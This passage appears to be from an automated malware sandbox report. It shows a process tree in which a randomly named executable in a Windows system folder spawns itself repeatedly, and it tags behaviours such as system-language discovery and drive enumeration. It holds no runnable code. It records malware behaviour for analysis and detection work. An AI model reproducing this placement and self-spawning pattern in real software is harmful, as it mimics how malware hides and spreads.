C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe109⤵PID:1080
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe110⤵PID:1744
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe111⤵PID:2392
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe112⤵PID:1724
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe113⤵PID:1324
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe114⤵PID:3076
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe115⤵PID:3092
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe116⤵
- System Location Discovery: System Language Discovery
PID:3108 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe117⤵PID:3124
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe118⤵
- System Location Discovery: System Language Discovery
PID:3144 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe119⤵PID:3156
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe120⤵
- System Location Discovery: System Language Discovery
PID:3168 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe121⤵
- Enumerates connected drives
PID:3180
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-